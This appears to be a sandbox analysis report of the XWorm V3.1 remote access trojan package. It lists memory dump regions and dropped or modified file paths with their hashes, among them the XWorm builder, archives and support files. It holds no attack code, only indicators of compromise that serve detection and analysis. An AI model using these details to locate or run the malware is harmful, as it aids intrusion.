memory/1512-944-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-945-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-946-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1512-947-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-948-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-949-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-950-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-952-0x0000000074890000-0x0000000075040000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.cmdline
| MD5 | 14bb9d57a9897e2e4313aa462c96e6b9 |
| SHA1 | 9f29cffe57e14f89bbf3323933483bd207c33529 |
| SHA256 | 7ee00d18df0c6b972b4b0138f73a2163f304e052811530ae4d0d51b800367be2 |
| SHA512 | 1a04482cd456b115dd9af5b0b97ab15adf51b6f454d5e53f5239f6dec3cff09f01b0e8f39df3e9a8324a054557b70a7c6db05d0eb9d6516de87da95b8def87a8 |
C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.0.vb
| MD5 | 3bac7893c9fd8069f8da8d14c1191257 |
| SHA1 | 8b1bd55f1d77bc15ab4082324bdc0f684ba6da53 |
| SHA256 | 5f9191012621c4784df56bd0949c46c7eb1d4d67bece5c43b4099f5facd1f29a |
| SHA512 | 5950a919acbca7f1f5baf6d4764e78bf5475812dc34f501f407895a658be86610eae0b66dd69475621abb4c251862813d083421d156b431faf32feab2ca8c0c7 |
C:\Users\Admin\AppData\Local\Temp\vbcF87B34828AF45FD95422731E385FB80.TMP
| MD5 | b70192bdfa82953d23893557b94122f2 |
| SHA1 | 4fd73efd6a6b28f57df1dde6a4241526c5b0fb60 |
| SHA256 | 6443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4 |
| SHA512 | 6dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da |
C:\Users\Admin\AppData\Local\Temp\RES7B37.tmp
| MD5 | 25b307c39e69b94d9d9a3ab59eaf3250 |
| SHA1 | 37b0403ef89e05ec8bb69a84a6c9e77606581816 |
| SHA256 | 8343254162b8a597bc6daf93e4bf689657c74d05072dd98e548b81123e242bc5 |
| SHA512 | 74e092d2eb4f416909048bceb84794373c0ce486cf48966dbd07b85c4ef87b776a00c0647b5c626de250756c1566562cb8466b4a621f60a8780c8af693f0f539 |
C:\Users\Admin\Desktop\XWorm.exe
| MD5 | 1b17dc0a383a40825ac21337ce31cd0b |
| SHA1 | fac0e76c443cda0576705058c11ca3ecd4f68968 |
| SHA256 | f5e997ef0c3a32a46ec68b6fef96a440d5ee8ace3015610a9fc6f9700980c81b |
| SHA512 | 3c0a0d5175c50139f54b1cfe4dbd69019d92940fdc314e9bbe612a71b850ba0c986ca6dd8ead6515ec2f05631f19bc0bc47de2dd6a429eea4cc756f49e506d95 |
C:\Users\Admin\Desktop\XWorm.exe
| MD5 | 1b17dc0a383a40825ac21337ce31cd0b |
| SHA1 | fac0e76c443cda0576705058c11ca3ecd4f68968 |
| SHA256 | f5e997ef0c3a32a46ec68b6fef96a440d5ee8ace3015610a9fc6f9700980c81b |
| SHA512 | 3c0a0d5175c50139f54b1cfe4dbd69019d92940fdc314e9bbe612a71b850ba0c986ca6dd8ead6515ec2f05631f19bc0bc47de2dd6a429eea4cc756f49e506d95 |
memory/3596-970-0x0000000000780000-0x0000000000790000-memory.dmp
memory/3596-971-0x00007FFE0DB40000-0x00007FFE0E601000-memory.dmp
memory/3596-972-0x0000000002920000-0x0000000002930000-memory.dmp
memory/4928-974-0x0000000006080000-0x0000000006090000-memory.dmp
memory/4928-973-0x0000000012BB0000-0x0000000012C32000-memory.dmp
memory/3596-975-0x00007FFE0DB40000-0x00007FFE0E601000-memory.dmp
memory/3596-976-0x0000000002920000-0x0000000002930000-memory.dmp
memory/4928-977-0x0000000006080000-0x0000000006090000-memory.dmp
memory/2840-979-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-978-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-980-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/2840-986-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-985-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-987-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-988-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-990-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-989-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/3596-993-0x000000001D560000-0x000000001DA88000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\builder.exe.log
| MD5 | 5200da2e50f24d5d543c3f10674acdcb |
| SHA1 | b574a3336839882d799c0a7f635ea238efb934ee |
| SHA256 | d2d81c1c9d35bc66149beaa77029bee68664d8512fc1efe373180bab77d61026 |
| SHA512 | 24722a7de3250a6027a411c8b79d0720554c4efd59553f54b94ab77dc21efbf3191e0912901db475f08a6e9c1855d9e9594504d80d27300097418f4384a9d9cb |
memory/4928-1009-0x0000000074890000-0x0000000075040000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 5c654283ea5fc50e549fd4522342d701 |
| SHA1 | d0bfaf182b39e29e30d0c53146027b4f3ff9a59c |
| SHA256 | 409c272228c3a717ba78295e14ad76d16e48dac758d94408ff7e681390466f9a |
| SHA512 | 8c206ddf67ea5b05eeae48fbab3c92748b0c2900ec36d09f86a1de415478aeb01a5569c4ff319c74bc271ff09c501294e2e7e59051c47c82cff7e3aeacd4892a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
| MD5 | 8114fe05a8b654a53d61c41bae0cc045 |
| SHA1 | 61504c41f564eeae5af502b16b8efe948bb6b593 |
| SHA256 | 4042edd1c2ccc58f0a948a960e0ab0a92d525b2093c4863c622524fd3df48d7d |
| SHA512 | 299b90ba7d15c0a105f363708a679f85dbdd9deed2e97079377a57118cbd65bdb743093816087c9281b9542d62514a4d13690423a4c219760b2cbf7f4e333d77 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
| MD5 | dbd695d2cc44a7e6a6e97cfd21fe71ee |
| SHA1 | cc055edabaf9d5ffce2dfb6fc6acdcdbf80749dd |
| SHA256 | 40470b8a514750ebed665a5e9b29955430f98f4406b23fbbad0c132e11cead83 |
| SHA512 | de7adbc9b454e4ba114a85663aac1fb27b7be55af314f2481f6d6004bbf46a51f7921be1ccff0c716d14f162aed8157f642cb446b612595d5abae8e62da72468 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
| MD5 | 13983f77bf4bb66bbd64e310eb2bffc9 |
| SHA1 | cf1857763eac12a0675fa93068734820289de75a |
| SHA256 | 17599982051a3a2f1b8a609bc7c970b18cdc25507e7979fa418a1ad6057f985d |
| SHA512 | d304d7ff8157ef141deee06ffe2e071e651105375b8462a90690786ce20aeef8a790b5e3d301af855d622e102b5e68e6c941ec5185817e9a80d0d0e2e94407bc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
| MD5 | 75239bad564e6a526ad9a61d9e6c5397 |
| SHA1 | 4474ee15bb5a5dd09f282ad69e9842f5e871edba |
| SHA256 | 1006685e191aa47457164764b54b4e57b552d75edc1406de9c41ed9072e8b45b |
| SHA512 | ac99c2768b1915cb6babb126b583393200a96294d8b59ba82f132da2a235269dcfab62a6464878e64a095b3fc74fba56da5cf001a2e1d808e7d645a0600cc2fe |
memory/4136-1016-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/3848-1023-0x000002EB0FC70000-0x000002EB0FC90000-memory.dmp
memory/3848-1025-0x000002EB0FC30000-0x000002EB0FC50000-memory.dmp
memory/3848-1028-0x000002EB10040000-0x000002EB10060000-memory.dmp
memory/3676-1037-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1038-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1039-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/3676-1042-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1043-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1044-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1045-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1046-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1047-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3596-1049-0x00007FFE0DB40000-0x00007FFE0E601000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
memory/2100-1057-0x0000018B7F140000-0x0000018B7F160000-memory.dmp
memory/2100-1061-0x0000018B7F100000-0x0000018B7F120000-memory.dmp
memory/2100-1063-0x0000018B7F500000-0x0000018B7F520000-memory.dmp
memory/3596-1073-0x000001D576E60000-0x000001D576E80000-memory.dmp
memory/3596-1077-0x000001D576E20000-0x000001D576E40000-memory.dmp
memory/3596-1080-0x000001D577230000-0x000001D577250000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
memory/772-1091-0x0000017917640000-0x0000017917660000-memory.dmp
memory/772-1094-0x0000017917600000-0x0000017917620000-memory.dmp
memory/772-1098-0x0000017917A90000-0x0000017917AB0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
memory/3568-1112-0x00000181D2CD0000-0x00000181D2CF0000-memory.dmp
memory/3568-1115-0x00000181D2C90000-0x00000181D2CB0000-memory.dmp
memory/3568-1119-0x00000181D32E0000-0x00000181D3300000-memory.dmp
memory/2868-1128-0x000001F15A7F0000-0x000001F15A810000-memory.dmp
memory/2868-1131-0x000001F15A7D0000-0x000001F15A7F0000-memory.dmp
memory/2868-1133-0x000001F15AEA0000-0x000001F15AEC0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 89bd107b6ae509f24169401636ddeb71 |
| SHA1 | 102b5202872a92e68776102690c455aacce4c6c8 |
| SHA256 | 0e58fb88a14c90c802822011ad1b5aedfa98f6620f550430771c767efffa35de |
| SHA512 | 106176e22fdf41dc39dad6106125fc1361fd80eade92675b576e257a73db4739a7088289c74d42cec23ad8923c92283c2b48df0dd53142e8da9457e60c93d923 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fe3277789347345b2b5a992832967648 |
| SHA1 | a65e5ada12bd736908a39cfd9c4a36765075f985 |
| SHA256 | 3fc4daf57ff9c326be75e79a021a0fd7e6def0d7e0726de85b73dc93c6a17e4b |
| SHA512 | fc6ae82b81ec94493660db1c830194a55aadadae8fa15ae069c71429eecbd0542cdc2637723349fe83a414cc923eab772278ab5faafde39b1d2e7dba57a4487d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9c8f5e92ee0d86a7b78b3bc68d8410ed |
| SHA1 | e4454077cfde8c40aca04769902cd11dde9d65ae |
| SHA256 | 2000a064457d4fe88e714d6a743b259cab68eb0d13b022553c2c990dc0c4c255 |
| SHA512 | e9ea8c13cc57ec1ea07574842d8e974bd8fb5262107f0db97c34b89f5a39613651f67488b4d3a1466a39c74d829286e300c81b5c08265528845866601a867283 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 4591abd904703b787033979885577ad9 |
| SHA1 | c530fbd8d3206b3c3c58b62a3cef884c716e4fcf |
| SHA256 | 8fe39a549ab0dcb2dca1b55da912a4014df8e53e89d6dd17a2ecfbaef4eceba9 |
| SHA512 | 6eab0e970abef0bb251c48cdcb946b9477ede42d758aa8e5ca2fe2f170afc9cb25d294e44b21306f5962ec1677063c89a9f7fd83c0e845d75b38d2c9968263e6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 2fd1f68d68bf83f29740885004a42a05 |
| SHA1 | 3545c9b9344ebaf5a654c877c90a09e393c50572 |
| SHA256 | c54dbb07ece2eca5abc361ba973172702524f5cb5de83efca12d0f53a90dd793 |
| SHA512 | b7fc0c49a01244d729debe7a3c3116884d211415c6e4edb9c8979409fbe685a361d698b1cbfe335a4669ab18668dd0c4438d3fabe9f3f477cb1da8477a40cb7a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c5bb579b78ba8fe6319f838055477b99 |
| SHA1 | 4ce57f08d11cec2a343bb39a48d295391f7c9756 |
| SHA256 | 73579b83db32a3ab6c0ee41e6f315902ec3ef5f69250d5bb5a965dd3e43d552b |
| SHA512 | df0cf754c9b54853bbbe1aeb026cb34402b9733a84b94305f373dc9017445bd4d915e99cd25eba1d716d7a04de16d4bcc514225f5683182e2417cb0fce9e8e6f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0c4762344ba28f1b1bd21dfb682728dd |
| SHA1 | 0b0d293d3d0d9bf259a5665ca36463777cd22943 |
| SHA256 | d9f23cead2c721a2e18e9ac4e87efc369b9fb31af7be949ff85162ac9e3563dd |
| SHA512 | 92b02d33b1d8cbcf2c73ac12de43be271a5a71be329f34cad9fca5b04b771d15e060db1616df3cbd22a09cdf95f032c2993c3b492f968f98a2ae8ccda391297e |
C:\Users\Admin\Downloads\XWorm-V3.1-main.zip
| MD5 | c62c2acc11b0b428811596a106b4b515 |
| SHA1 | 5ef29c1bf32ad7c4a3d7400e8d06247e2b920409 |
| SHA256 | ac8caebe03bc2c3c903e6ceaa1020c1d362d4f8524d7c4f18670cba802f4f598 |
| SHA512 | adff2d54a4cc7d9e8b6fad20f001558e5cdf343595dcc504e6be50eadc37b05f4b9fc4bef95808825adf801640997f889b019a5b2b466a644358443a7d5e7a3a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e3abe84ce15fc3a593519ee367cea5ad |
| SHA1 | e27d540f08164e76a57c27e98f09ad57e2a204a9 |
| SHA256 | e5b997f9d42fd469a9e20712276f94bb7619d04cfc3caf1d63b2836b5f355d0b |
| SHA512 | 41d923643c4685ea7d829fd8f1d9bb1cf23222007f8f0e86c9d573502df8b9041f3c12db736963cceda4ec9f4f45c8cdeaa75b47d864224169d90d86bdb87103 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 873f3c21f43af859fbec88b54e1ccbea |
| SHA1 | b8dadffaad6853f6ea7e602d3f7f559fb13aea45 |
| SHA256 | c0083b86c7900811f6a78b6e017c3a23ee84849e21faf28536899e067ccf7c86 |
| SHA512 | 405357700ba197f0b07c89a4ede7c1d3dec81afa8b8e241785a27c15f258c2f35e7f552a5389483a7f7a7d67f76b07f82e86fe34119fc30b5aed79b9735e8db4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8fbbd014eb3e5395329bc5458c44f5a9 |
| SHA1 | e5874a89e7eca41cc016e5d4f7b835fbf04fef95 |
| SHA256 | aa23908db0c8f1a2ce42fee772a8dea41a3e08a85cbc7c19956cb82d853aca85 |
| SHA512 | f4524ac4d931ede200e6eada1e739d6c1b306db8c08f5011c55c9bccc35095d355beb0eed5a37c366c564198716e4ed3d9e70e53bb7e70a24f96158efe75be57 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 7bffc149c48df51d3ba046ff2f51fc1c |
| SHA1 | dda9ecc508560368eb7a13113048114f0bcbe19b |
| SHA256 | f1c0e289fbd33d9fc0700b36c219c6d2e943318c0e79e4561938f9cb8e83b3eb |
| SHA512 | d77a697449dcafa4ed51fc8106139e30378d836e0eee85cd1dc44947005a8ef0b7f8fed746aa9be0200b5363ba49a82b0704af6f162af4f19f9cb001890ae685 |
C:\Users\Admin\Desktop\New folder\XWorm.V3.1.7z
| MD5 | 809fa0ce52950e65983d16bcc3803900 |
| SHA1 | ad8cb46e4f49ddf05c167ce63bf3e449c3bfe25a |
| SHA256 | 657863a210016af574c75b32f00c012d47c3d96f53734dd5aa1b69d33256283e |
| SHA512 | 3243db58db3f6fd67f58652b112dca78ce1111d57814ca29a62e7dcdecb296a06e0b22a3b08652cb11b49e058bff6914cd8da8877a0c918b7e35988f5f3b23df |
C:\Users\Admin\Desktop\New folder\XWorm.V3.1.7z
| MD5 | 809fa0ce52950e65983d16bcc3803900 |
| SHA1 | ad8cb46e4f49ddf05c167ce63bf3e449c3bfe25a |
| SHA256 | 657863a210016af574c75b32f00c012d47c3d96f53734dd5aa1b69d33256283e |
| SHA512 | 3243db58db3f6fd67f58652b112dca78ce1111d57814ca29a62e7dcdecb296a06e0b22a3b08652cb11b49e058bff6914cd8da8877a0c918b7e35988f5f3b23df |
C:\Users\Admin\Desktop\New folder\Icons\icon (15).ico
| MD5 | e3143e8c70427a56dac73a808cba0c79 |
| SHA1 | 63556c7ad9e778d5bd9092f834b5cc751e419d16 |
| SHA256 | b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188 |
| SHA512 | 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc |
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe
| MD5 | b7a300c6953f42f199c2ff903feac72f |
| SHA1 | 8f7d38270d33ae7f1b1fa49cd03ecfc63576a8b8 |
| SHA256 | f40b8ef92f828123c81a8b275ab0e29e44b44b3a175e452eea72a475f6cfaf80 |
| SHA512 | 80ef310b54e8c54b80649651acb58c07251bdcf1cde9ead0b85123fee2922e40958a78cc029bb28a69c8ea993952c4cf973b4448b9d24580c535a7460dfbca47 |
C:\Users\Admin\Desktop\New folder\GMap.NET.WindowsForms.dll
| MD5 | 32a8742009ffdfd68b46fe8fd4794386 |
| SHA1 | de18190d77ae094b03d357abfa4a465058cd54e3 |
| SHA256 | 741e1a8f05863856a25d101bd35bf97cba0b637f0c04ecb432c1d85a78ef1365 |
| SHA512 | 22418d5e887a6022abe8a7cbb0b6917a7478d468d211eecd03a95b8fb6452fc59db5178573e25d5d449968ead26bb0b2bfbfada7043c9a7a1796baca5235a82b |
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe
| MD5 | b7a300c6953f42f199c2ff903feac72f |
| SHA1 | 8f7d38270d33ae7f1b1fa49cd03ecfc63576a8b8 |
| SHA256 | f40b8ef92f828123c81a8b275ab0e29e44b44b3a175e452eea72a475f6cfaf80 |
| SHA512 | 80ef310b54e8c54b80649651acb58c07251bdcf1cde9ead0b85123fee2922e40958a78cc029bb28a69c8ea993952c4cf973b4448b9d24580c535a7460dfbca47 |
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe.config
| MD5 | 66f09a3993dcae94acfe39d45b553f58 |
| SHA1 | 9d09f8e22d464f7021d7f713269b8169aed98682 |
| SHA256 | 7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7 |
| SHA512 | c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed |
memory/1172-1400-0x00007FFE0E490000-0x00007FFE0EF51000-memory.dmp
memory/1172-1401-0x0000000000C20000-0x0000000001332000-memory.dmp
memory/1172-1403-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1404-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133340180543279630.txt
| MD5 | 531cc66733871fcd169442abd46a8bd9 |
| SHA1 | 1b6827ae7a22f35340ee56ff42a194a2e2538bf2 |
| SHA256 | a212b2d6bd6f7f8549ca86316262616f9f7fed4fcae3186dd8ba6d2706835402 |
| SHA512 | fb2224b74b5f463d50b0a49a14dd65f9cd865e5988db7a237f9e2b6fd256370d18f8596a862773ef709b54a6d76cc52c36e5c06332e5d8db3bef26427e3257c6 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer
| MD5 | ab0262f72142aab53d5402e6d0cb5d24 |
| SHA1 | eaf95bb31ae1d4c0010f50e789bdc8b8e3116116 |
| SHA256 | 20a108577209b2499cfdba77645477dd0d9771a77d42a53c6315156761efcfbb |
| SHA512 | bf9580f3e5d1102cf758503e18a2cf98c799c4a252eedf9344f7c5626da3a1cf141353f01601a3b549234cc3f2978ad31f928068395b56f9f0885c07dbe81da1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
| MD5 | f4e2076b704d68d14a8dc8962b01fcdd |
| SHA1 | 64f53c8f56907e325bbbfe8bf80d7854830e7e4c |
| SHA256 | 0d258f28b00038ec0bf3d372fcd13d2d898a0599442d14ddfded147b14dae35b |
| SHA512 | 0552b6d8ed646b1efaf804f5f3a996935f778027590254c0ad6f8ef559c61759f0ec4f6ba9c228e01df9409d9b33add5bd7acd7e0e996d898f2bf8e8d8f13672 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Java_jre1_8_0_66_bin_javacpl_exe
| MD5 | 8aaad0f4eb7d3c65f81c6e6b496ba889 |
| SHA1 | 231237a501b9433c292991e4ec200b25c1589050 |
| SHA256 | 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1 |
| SHA512 | 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62 |
C:\Users\Admin\Desktop\New folder\GeoIP.dat
| MD5 | 8ef41798df108ce9bd41382c9721b1c9 |
| SHA1 | 1e6227635a12039f4d380531b032bf773f0e6de0 |
| SHA256 | bc07ff22d4ee0b6fafcc12482ecf2981c172a672194c647cedf9b4d215ad9740 |
| SHA512 | 4c62af04d4a141b94eb3e1b0dbf3669cb53fe9b942072ed7bea6a848d87d8994cff5a5f639ab70f424eb79a4b7adabdde4da6d2f02f995bd8d55db23ce99f01b |
memory/1172-1480-0x00007FFE0E490000-0x00007FFE0EF51000-memory.dmp
memory/1172-1481-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
C:\Users\Admin\Desktop\New folder\Intro.wav
| MD5 | dc28d546b643c5a33c292ae32d7cf43b |
| SHA1 | b1f891265914eea6926df765bce0f73f8d9d6741 |
| SHA256 | 20dcc4f50eb47cafda7926735df9ef8241598b83e233066ea495d4b8aa818851 |
| SHA512 | 9d8c1bb61b6f564044aad931e685387df9bc00a92ab5efe7191b94a3d45c7d98a6f71d8ae5668252d6a7b5b44ab6704464d688772aedac8bdb2773d5765d4d56 |
memory/1172-1483-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1486-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1487-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1488-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c1d2e69ee60c15640056c2a862396f21 |
| SHA1 | ec0947cb011f06743e54e39d04745e0e8a40c8af |
| SHA256 | 7d71812a7a79a7fe08129abfb17bd40a84f6122484a48ea9c885b56c98709764 |
| SHA512 | b7b54740fe766db5f060727cd90ca22a968e023932a63c3ad6c767584d1b17f09b56117e28505576f530606bead65511f002babef0be38d7bbd6c211c889bb02 |
C:\Users\Admin\AppData\Local\Temp\Temp1_XWorm-3.1-main.zip\XWorm-3.1-main\LatestRelease.zip
| MD5 | 1f3d3851380d1158329842419d9124a0 |
| SHA1 | e3e7b94632322eb70a54dfe0f7be1d91263831ed |
| SHA256 | 0557f385de60e9114c4eb74d9aa5631b537e42fe576329e6365093b1ea956991 |
| SHA512 | f3d495c117ce672ccb361880c055e5f74c293d55b4f94b87020ab1453fb6d3043c15f417fbc2ff552770d3b8379a7a3062edb496d9d9a69088e245afee2b54a2 |
C:\Users\Admin\Desktop\AtlsWare.exe
